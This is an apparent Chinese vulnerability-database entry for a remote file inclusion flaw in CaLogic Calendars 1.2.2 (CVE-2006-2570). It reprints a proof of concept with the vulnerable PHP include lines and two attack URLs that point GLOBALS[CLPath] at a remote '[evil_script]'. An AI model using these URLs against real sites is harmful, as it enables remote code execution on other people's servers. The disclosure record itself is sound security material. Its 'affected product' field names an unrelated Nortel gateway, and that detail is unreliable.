CaLogic Calendars 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110307 漏洞类型 输入验证
发布时间 2006-05-20 更新时间 2007-02-20
CVE编号 CVE-2006-2570 CNNVD-ID CNNVD-200605-464
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1809
https://www.securityfocus.com/bid/18076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-464
|漏洞详情
CaLogicCalendars1.2.2存在PHP远程文件包含漏洞。远程攻击者可以借助对(1)reconfig.php和(2)srxclr.php的GLOBALS["CLPath"]参数中的URL,执行任意PHP代码。注意:此问题可能由全局重写问题所致。
|漏洞EXP
################ DEVIL TEAM THE BEST POLISH TEAM #################
#CaLogic Calendars V1.2.2 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#dork: CaLogic Calendars V1.2.2
##################################################################
reconfig.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/classes/session.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
[/code]

http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]


srxclr.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/include/calfunc.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/include/efuncs.php");
[/code]

http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]

#pozdro :)

# milw0rm.com [2006-05-20]
|受影响的产品
Nortel Networks Contivity 4500 Secure IP Services Gateway 1.2.2
|参考资料

来源:BID
名称:18076
链接:http://www.securityfocus.com/bid/18076
来源:MILW0RM
名称:1809
链接:http://www.milw0rm.com/exploits/1809
来源:XF
名称:calogic-reconfig-srxclr-file-include(26590)
链接:http://xforce.iss.net/xforce/xfdb/26590
来源:MILW0RM
名称:1809
链接:http://milw0rm.com/exploits/1809